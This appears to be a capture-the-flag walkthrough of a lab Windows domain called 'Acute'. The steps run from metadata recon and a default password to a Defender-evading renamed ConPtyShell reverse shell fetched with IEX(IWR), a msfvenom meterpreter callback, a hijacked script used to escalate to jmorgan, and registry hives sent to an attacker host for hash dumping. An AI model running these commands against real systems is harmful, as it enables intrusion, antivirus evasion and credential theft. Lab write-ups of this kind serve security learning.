Acute
Recon
HTTPs (443)

Visiting the domain serves a static site. On /about.html there is a New Starter section with a link that lets us download the starter forms.

└─$ curl -kLOs https://atsserver.acute.local/New_Starter_CheckList_v7.docx
└─$ exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number : 12.76
File Name : New_Starter_CheckList_v7.docx
Directory : .
File Size : 35 kB
File Modification Date/Time : 2024:12:20 04:39:27-05:00
File Access Date/Time : 2024:12:20 04:39:34-05:00
File Inode Change Date/Time : 2024:12:20 04:39:27-05:00
File Permissions : -rw-rw-r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x079b7eb2
Zip Compressed Size : 428
Zip Uncompressed Size : 2527
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
Revision Number : 8
Last Printed : 2021:01:04 15:54:00Z
Create Date : 2021:12:08 14:21:00Z
Modify Date : 2021:12:22 00:39:00Z
Template : Normal.dotm
Total Edit Time : 2.6 hours
Pages : 3
Words : 886
Characters : 5055
Application : Microsoft Office Word
Doc Security : None
Lines : 42
Paragraphs : 11
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company : University of Marvel
Links Up To Date : No
Characters With Spaces : 5930
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000
└─$ open New_Starter_CheckList_v7.docx
The checklist itself contains a default password for new starters:
Default Password:
Password1!
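As an added example (not part of the original writeup): a small Python script that pulls the same identity-revealing properties exiftool showed above out of a .docx, which is the check to run on documents before publishing them. The sample document is constructed in memory with the property values from the exiftool output; it carries no real document content.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# XML namespaces of the two OOXML property parts inside a .docx.
NS_CP = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
NS_DC = "http://purl.org/dc/elements/1.1/"
NS_APP = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"

# Label -> element name (Clark notation) for the properties exiftool printed.
CORE_FIELDS = {
    "Creator": "{%s}creator" % NS_DC,
    "Last Modified By": "{%s}lastModifiedBy" % NS_CP,
    "Description": "{%s}description" % NS_DC,
}
APP_FIELDS = {
    "Application": "{%s}Application" % NS_APP,
    "Company": "{%s}Company" % NS_APP,
    "Template": "{%s}Template" % NS_APP,
}

# Properties that name a person, a machine or an organisation; a metadata
# scrub should clear these before a document goes on a public site.
IDENTITY_FIELDS = ("Creator", "Last Modified By", "Description", "Company")


def _text(root, tag):
    el = root.find(tag)
    return (el.text or "").strip() if el is not None else ""


def docx_metadata(data):
    """Read docProps/core.xml and docProps/app.xml from a .docx given as bytes.
    Either part may be absent (some generators omit app.xml); only non-empty
    properties are returned."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            root = ET.fromstring(z.read("docProps/core.xml"))
            for label, tag in CORE_FIELDS.items():
                found[label] = _text(root, tag)
        if "docProps/app.xml" in names:
            root = ET.fromstring(z.read("docProps/app.xml"))
            for label, tag in APP_FIELDS.items():
                found[label] = _text(root, tag)
    return {k: v for k, v in found.items() if v}


def identity_leaks(meta):
    """Return only the identity-revealing properties present in `meta`."""
    return {k: meta[k] for k in IDENTITY_FIELDS if k in meta}


def build_sample_docx(include_app=True):
    """Constructed sample: a minimal .docx whose properties match the values
    in the exiftool output above. Not a real document."""
    core = (
        f'<cp:coreProperties xmlns:cp="{NS_CP}" xmlns:dc="{NS_DC}">'
        "<dc:creator>FCastle</dc:creator>"
        "<cp:lastModifiedBy>Daniel</cp:lastModifiedBy>"
        "<dc:description>Created on Acute-PC01</dc:description>"
        "<cp:revision>8</cp:revision>"
        "</cp:coreProperties>"
    )
    app = (
        f'<Properties xmlns="{NS_APP}">'
        "<Application>Microsoft Office Word</Application>"
        "<Company>University of Marvel</Company>"
        "<Template>Normal.dotm</Template>"
        "</Properties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docProps/core.xml", core)
        if include_app:
            z.writestr("docProps/app.xml", app)
        z.writestr("word/document.xml", "<document/>")
    return buf.getvalue()


if __name__ == "__main__":
    meta = docx_metadata(build_sample_docx())
    for label, value in identity_leaks(meta).items():
        print("%-17s %s" % (label, value))
```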

There's 1 more link: https://atsserver.acute.local/Acute_Staff_Access

FCastle (the document's Creator) doesn't work as a login, but it reveals the username format: first initial plus surname. The /about.html page lists the staff names:
...these members include Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins.
# Usernames
AWallace
CHall
EDavies
IMonks
JMorgan
LHopkins
# Passwords
Password1!

Staff Access (EDavies)
Creds:
EDavies:Password1!:Acute-PC01

PS C:\Users\edavies\Documents> whoami /all
User Name SID
============= ==============================================
acute\edavies S-1-5-21-1786406921-1914792807-2072761762-1106
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Kerberos support for Dynamic Access Control on this device has been disabled.
There is no web server on this machine, but there is a C:\Utils directory:
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/7/2019 9:14 AM PerfLogs
d-r--- 12/6/2021 11:06 AM Program Files
d-r--- 12/7/2021 12:43 PM Program Files (x86)
d-r--- 12/21/2021 10:50 PM Users
d----- 1/31/2022 12:29 AM Utils
d----- 12/16/2021 1:23 AM Windows
PS C:\> cd utils
PS C:\utils> ls -force
Directory: C:\utils
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 12/21/2021 6:41 PM 148 desktop.ini
PS C:\utils> cat .\desktop.ini
[.ShellClassInfo]
InfoTip=Directory for Testing Files without Defender
The InfoTip suggests Defender is disabled (excluded) for this directory.
Reverse Shell
Let's upgrade the shell. ConPtyShell is detected by Defender and never calls back:
└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444
---
PS C:\utils> IEX(IWR http://10.10.14.123/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.123 4444
Since Defender's detection here is signature based, replacing a few telltale words in the PowerShell script is enough for Defender to let it through, and we get a callback:
└─$ sed '/<#/,/#>/d; s/ConPtyShell/Letmein/g' Invoke-ConPtyShell.ps1 > Invoke-Letmein.ps1
---
PS C:\utils> IEX(IWR http://10.10.14.123/Invoke-Letmein.ps1 -UseBasicParsing); Invoke-Letmein 10.10.14.123 4444
Fix the terminal size to match your own stty size output (from the ConPtyShell docs):
$width=210
$height=45
$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)
$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)
Enumerate with winPEAS:
PS C:\> curl.exe 10.10.14.123/wp.exe -o /Utils/wp.exe
PS C:\Utils> .\wp.exe | tee -filepath wp.log
╔══════════╣ AV Information
[X] Exception: Access denied
No AV was detected!!
whitelistpaths: C:\Utils
C:\Windows\System32
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
╔══════════╣ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.19041.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\edavies\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 6B
╔══════════╣ Checking KrbRelayUp
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (ACUTE) so it could be vulnerable.
╚ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
╔══════════╣ Checking If Inside Container
╚ If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container
╔══════════╣ RDP Sessions
Not Found
╔══════════╣ Ever logged users
[X] Exception: Access denied
Not Found
╔══════════╣ Home folders found
C:\Users\administrator.ACUTE
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\edavies : edavies [AllAccess]
C:\Users\jmorgan
C:\Users\Natasha
C:\Users\Public
╔══════════╣ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : Acute
DefaultUserName : edavies
DefaultPassword : Password1!
╔══════════╣ Checking Credential manager
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-manager-windows-vault
[!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string
[!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): A specified logon session does not exist. It may already have been terminated'
Please run:
cmdkey /list
╔══════════╣ Looking for possible password files in users homes
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
C:\Users\edavies\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\2.0.0.0\passwords.txt
╔══════════╣ Looking for Linux shells/distributions - wsl.exe, bash.exe
C:\Windows\System32\wsl.exe
Get-Process shows processes in two sessions, 0 and 1. We are probably in session 0, since that is where our powershell runs, while session 1 belongs to some other user.
PS C:\Utils> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
134 9 6316 11988 0.02 644 0 conhost
98 7 1512 5468 1.66 1168 0 conhost
342 14 1624 4808 492 0 csrss
167 11 1536 4668 576 1 csrss
354 17 3108 12112 3292 0 dasHost
705 27 18136 40172 972 1 dwm
37 6 1452 3744 796 0 fontdrvhost
0 0 60 8 0 0 Idle
707 38 18264 63532 964 1 LogonUI
1014 28 4868 15416 668 0 lsass
0 0 172 15628 1816 0 Memory Compression
210 12 1904 684 748 0 MicrosoftEdgeUpdate
379 18 15828 29596 3532 0 MoUsoCoreWorker
209 11 3952 10580 3736 0 NisSrv
613 28 119680 131432 4.64 1276 0 powershell
0 11 2584 17288 72 0 Registry
318 11 3248 7612 660 0 services
105 7 3508 6472 3356 0 SgrmBroker
53 3 1060 1108 384 0 smss
419 21 12176 17528 480 0 svchost
393 14 3508 10968 564 0 svchost
662 19 12472 17888 688 0 svchost
1220 20 6880 16928 804 0 svchost
700 38 8384 23340 860 0 svchost
618 17 3620 9632 888 0 svchost
208 13 1784 7524 1028 0 svchost
572 28 53316 53500 1044 0 svchost
831 54 8664 22980 1160 0 svchost
410 31 12160 20176 1416 0 svchost
427 24 3424 11568 1444 0 svchost
278 14 3112 9584 1476 0 svchost
126 8 1492 6292 1924 0 svchost
362 12 2176 9068 1932 0 svchost
205 11 1848 7992 2788 0 svchost
364 18 4312 15676 2932 0 svchost
350 21 3148 10092 3260 0 svchost
137 9 4080 12256 3520 0 svchost
211 12 2316 9892 3772 0 svchost
240 14 7044 19716 3868 0 svchost
1436 0 192 144 4 0 System
111 7 1352 6364 3616 0 uhssvc
162 11 1352 6656 568 0 wininit
216 11 2148 8456 636 1 winlogon
716 35 116392 138604 2.77 500 0 wsmprovhost
376 24 39248 48416 0.66 2732 0 wsmprovhost
qwinsta shows session 1 is an active console logon of edavies (the AutoLogon user winPEAS found):
PS C:\Users\edavies\Documents> qwinsta.exe
SESSIONNAME USERNAME ID STATE TYPE DEVICE
console edavies 1 Active
Generate a meterpreter payload so we can migrate into a session-1 process and watch the console:
└─$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=tun0 LPORT=4445 -o rev4445.exe
└─$ msfconsole -q -x 'use multi/handler; set LHOST tun0; set LPORT 4445; set payload windows/meterpreter/reverse_tcp; run'
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.123:4445
---
PS C:\Utils> curl.exe 10.10.14.123/rev4445.exe -Os
PS C:\Utils> .\rev4445.exe
---
[*] Sending stage (176198 bytes) to 10.129.76.192
[*] Meterpreter session 1 opened (10.10.14.123:4445 -> 10.129.76.192:49810) at 2024-12-20 05:41:40 -0500
meterpreter > getuid
Server username: ACUTE\edavies
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
72 4 Registry
408 4 smss.exe
460 640 svchost.exe
476 640 svchost.exe
512 500 csrss.exe
580 500 wininit.exe
588 572 csrss.exe
640 580 services.exe
672 580 lsass.exe
680 572 winlogon.exe
736 640 svchost.exe
800 580 fontdrvhost.exe
808 640 svchost.exe
816 680 fontdrvhost.exe
872 640 svchost.exe
900 640 svchost.exe
976 640 svchost.exe
980 680 dwm.exe
1052 640 svchost.exe
1060 640 svchost.exe
1132 640 svchost.exe
1420 640 svchost.exe
1440 640 svchost.exe
1476 640 svchost.exe
1508 640 MsMpEng.exe
1768 4 Memory Compression
1896 640 svchost.exe
1908 640 svchost.exe
2104 4356 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
2128 4356 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
2476 640 svchost.exe
2540 640 SecurityHealthService.exe
2544 640 svchost.exe
2616 476 CompatTelRunner.exe
2656 6124 rev4445.exe x86 0 ACUTE\edavies C:\Utils\rev4445.exe
2888 640 svchost.exe
2916 476 wermgr.exe
3000 2616 conhost.exe
3008 808 smartscreen.exe x64 1 ACUTE\edavies C:\Windows\System32\smartscreen.exe
3012 640 svchost.exe
3280 476 sihost.exe x64 1 ACUTE\edavies C:\Windows\System32\sihost.exe
3292 640 svchost.exe x64 1 ACUTE\edavies C:\Windows\System32\svchost.exe
3304 5280 conhost.exe x64 1 ACUTE\edavies C:\Windows\System32\conhost.exe
3380 476 MicrosoftEdgeUpdate.exe
3400 476 taskhostw.exe x64 1 ACUTE\edavies C:\Windows\System32\taskhostw.exe
3616 476 OneDriveStandaloneUpdater.exe x64 1 ACUTE\edavies C:\Users\edavies\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
3656 3644 explorer.exe x64 1 ACUTE\edavies C:\Windows\explorer.exe
3744 4356 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
3748 808 TiWorker.exe
3808 640 svchost.exe x64 1 ACUTE\edavies C:\Windows\System32\svchost.exe
3824 640 NisSrv.exe
4084 476 taskhostw.exe x64 1 ACUTE\edavies C:\Windows\System32\taskhostw.exe
4220 808 StartMenuExperienceHost.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
4296 808 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
4308 640 svchost.exe
4356 3656 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4368 3656 OneDrive.exe x64 1 ACUTE\edavies C:\Users\edavies\AppData\Local\Microsoft\OneDrive\OneDrive.exe
4392 4356 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4492 808 SearchApp.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
4652 808 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
4692 808 WmiPrvSE.exe
4716 6080 conhost.exe x64 1 ACUTE\edavies C:\Windows\System32\conhost.exe
4996 808 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
5144 2616 CompatTelRunner.exe
5280 476 cmd.exe x64 1 ACUTE\edavies C:\Windows\System32\cmd.exe
5288 808 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exe
5360 808 WmiPrvSE.exe
5376 640 TrustedInstaller.exe
5680 640 SgrmBroker.exe
5688 640 svchost.exe
5752 640 uhssvc.exe
5784 5280 Utilman.exe x64 1 ACUTE\edavies C:\Windows\System32\Utilman.exe
5820 808 MoUsoCoreWorker.exe
5908 640 svchost.exe
6080 3656 powershell.exe x64 1 ACUTE\edavies C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6124 808 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exe
meterpreter > migrate 3656
[*] Migrating from 2656 to 3656...
[*] Migration completed successfully.
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/woyag/Desktop/Rooms/Acute/SnTSkQdz.html
[*] Streaming...
Privilege Escalation (imonks)

Creds:
imonks:W3_4R3_th3_f0rce.
meterpreter > shell
C:\Windows\system32>powershell
PS C:\Windows\system32> $username = "acute\imonks"
PS C:\Windows\system32> $passwd = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."
PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential($username, $passwd)
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { whoami }
acute\imonks
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { IEX(IWR http://10.10.14.123/Invoke-Letmein.ps1 -UseBasicParsing); Invoke-Letmein 10.10.14.123 4444; }
Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { id }
User.txt
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat ../Desktop/user.txt }
4635fd7a67cc1f63dbf88272c5bb81d4
Privilege Escalation (jmorgan)
I tried getting a reverse shell the same way as for EDavies, but no command worked on ATSSERVER. The dc_manage session only exposes a handful of cmdlets; list them:
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { Get-Command }
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls ../ -rec }
Directory: C:\Users\imonks
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d-r--- 21/12/2021 22:29 Desktop ATSSERVER
d-r--- 21/12/2021 16:01 Documents ATSSERVER
d-r--- 15/09/2018 08:12 Downloads ATSSERVER
d-r--- 15/09/2018 08:12 Favorites ATSSERVER
d-r--- 15/09/2018 08:12 Links ATSSERVER
d-r--- 15/09/2018 08:12 Music ATSSERVER
d-r--- 15/09/2018 08:12 Pictures ATSSERVER
d----- 15/09/2018 08:12 Saved Games ATSSERVER
d-r--- 15/09/2018 08:12 Videos ATSSERVER
Directory: C:\Users\imonks\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 20/12/2024 16:51 34 user.txt ATSSERVER
-a---- 11/01/2022 18:04 602 wm.ps1 ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat ../Desktop/wm.ps1 }
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
We can't decrypt this string locally (ConvertTo-SecureString : Key not valid for use in specified state): a SecureString exported without -Key is protected with DPAPI, so it only decrypts for the user and machine that created it.
We do have permission to write to files, but can we execute them?
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 }
PSComputerName : ATSSERVER
RunspaceId : a13b6e27-0822-4025-835e-d38c56eb77d4
ObjectId : {1}\\ACUTE-PC01\root/Microsoft/Windows/Storage/Providers_v2\WSP_Volume.ObjectId="{8ccfebca-48c0-11ec-9ffe-806e6f6e6963}:VO:\\?\Volume{0eed1261-0000-0000-0000-100000000000}\""
PassThroughClass :
PassThroughIds :
PassThroughNamespace :
PassThroughServer :
UniqueId : \\?\Volume{0eed1261-0000-0000-0000-100000000000}\
AllocationUnitSize : 4096
DedupMode : 4
DriveLetter :
DriveType : 3
FileSystem : NTFS
FileSystemLabel : System Reserved
FileSystemType : 14
HealthStatus : 0
OperationalStatus : {2}
Path : \\?\Volume{0eed1261-0000-0000-0000-100000000000}\
Size : 52424704
SizeRemaining : 20611072
...
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ((cat C:\Users\imonks\Desktop\wm.ps1) -Replace "Get-Volume", "IEX(IWR http://10.10.14.123/Invoke-Letmein.ps1 -UseBasicParsing); Invoke-Letmein 10.10.14.123 4444;") | Set-Content C:\Users\imonks\Desktop\wm.ps1 }
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat C:\Users\imonks\Desktop\wm.ps1 }
PS C:\Utils> Start-Job -ScriptBlock { $username = "acute\imonks"; $passwd = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."; $cred = New-Object System.Management.Automation.PSCredential($username, $passwd); Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 } }
PS C:\Windows\system32> whoami /all
User Name SID
============= ==============================================
acute\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:\> hostname
Acute-PC01
We are an admin user now, but still on Acute-PC01 even though the command was issued on ATSSERVER: wm.ps1 runs its own Invoke-Command against Acute-PC01 with jmorgan's credentials, so our replacement payload executed there 🤔
There's an odd directory, keepmeon, in C:\Program Files on ATSSERVER, but we, the administrator, can't read it (?). Unfortunately we can't run
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls '/Program Files' }
Directory: C:\Program Files
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 21/12/2021 00:04 common files ATSSERVER
d----- 21/12/2021 00:11 Hyper-V ATSSERVER
d----- 15/09/2018 08:12 internet explorer ATSSERVER
d----- 01/02/2022 19:41 keepmeon ATSSERVER
d----- 21/12/2021 00:04 VMware ATSSERVER
d----- 20/12/2021 21:19 Windows Defender ATSSERVER
d----- 20/12/2021 21:12 Windows Defender Advanced Threat ATSSERVER
d----- 21/12/2021 14:13 WindowsPowerShell ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls '/Program Files/keepmeon' }
Access to the path 'C:\Program Files\keepmeon' is denied.
+ CategoryInfo : PermissionDenied: (C:\Program Files\keepmeon:String) [Get-ChildItem], UnauthorizedAccess Exception
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+ PSComputerName : ATSSERVER
# Start listeners on the attacker box, then dump the registry hives as jmorgan and send them over
nc -lvnp 4444 > sam.save &
nc -lvnp 4445 > system.save &
nc -lvnp 4446 > security.save &
---
PS C:\Users> function SendOverTcp { param([string]$server, $port, $filePath); ($tcpClient = New-Object Net.Sockets.TcpClient($server, $port)).GetStream().Write(($bytes = [IO.File]::ReadAllBytes($filePath)), 0, $bytes.Length); $tcpClient.Close() }
PS C:\Users> whoami
acute\jmorgan
PS C:\Users> cd jmorgan/Music
PS C:\Users\jmorgan\Music> reg save hklm\sam sam.save
PS C:\Users\jmorgan\Music> reg save hklm\system system.save
PS C:\Users\jmorgan\Music> reg save hklm\security security.save
PS C:\Users\jmorgan\Music> $server = "10.10.14.123";
PS C:\Users\jmorgan\Music> $port = 4444; $filePath = "C:\users\jmorgan\music\sam.save"; SendOverTcp "$server" "$port" "$filePath"
PS C:\Users\jmorgan\Music> $port = 4445; $filePath = "C:\users\jmorgan\music\system.save"; SendOverTcp "$server" "$port" "$filePath"
---
└─$ impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x44397c32a634e3d8d8f64bff8c614af7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
